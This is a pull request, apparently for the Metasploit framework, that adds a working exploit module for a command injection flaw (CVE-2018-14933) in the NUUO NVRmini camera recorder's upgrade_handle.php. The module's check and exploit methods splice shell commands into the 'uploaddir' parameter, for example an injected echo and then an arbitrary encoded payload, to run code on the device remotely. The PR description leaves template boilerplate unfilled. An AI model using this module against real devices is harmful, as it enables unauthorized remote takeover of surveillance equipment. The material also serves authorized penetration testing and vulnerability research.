### PR TITLE
nuuo_nvrmini_upgrade_rce

### DIFF
--- a/modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce
+++ b/modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => %w{ unix win },
       'Arch'           => ARCH_CMD,
       'Targets'        => [ ['NUUO NVRmini', { }], ],
-      'DisclosureDate' => 'Jul 23 2018',
+      'DisclosureDate' => 'Dec 06 2018',
       'DefaultTarget'  => 0))
 
   end

--- a/modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce
+++ b/modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce
@@ -1,0 +1,78 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'NUUO NVRmini - upgrade_handle.php Remote Command Execution',
+      'Description'    => %q{
+      NUUO NVRmini  ip camera web application. The upgrade_handle.php file is affected by the remote command execution vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => 
+        [
+          'Berk Dusunur <@berkdusunur>', 
+          'numan turle <@numanturle>' 
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.exploit-db.com/exploits/45070/'],
+          ['URL', 'http://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
+          ['CVE', '2018-14933'],
+          ['EDB','45070']
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [ ['NUUO NVRmini', { }], ],
+      'DisclosureDate' => 'Jul 23 2018',
+      'DefaultTarget'  => 0))
+
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path.to_s, "upgrade_handle.php"),
+      'vars_get'        =>
+        {
+          'cmd' => 'writeuploaddir',
+          'uploaddir' => "';echo 'exploit_ok';'"
+        }
+    })
+    if res.code == 200 and res.body =~ /upload_tmp_dir/
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def http_send_command(cmd)
+    uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'             => uri,
+      'vars_get'        =>
+        {
+          'cmd' => 'writeuploaddir',
+          'uploaddir' => "';"+cmd+";'"
+        }
+    })
+    unless res
+      fail_with(Failure::Unknown, 'Failed to execute the command.')
+    end
+    res
+  end
+
+  def exploit
+    http_send_command(payload.encoded)
+  end
+end


### PR DESCRIPTION
NUUO NVRmini  ip camera web application. The upgrade_handle.php file is affected by the remote command execution vulnerability.


Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

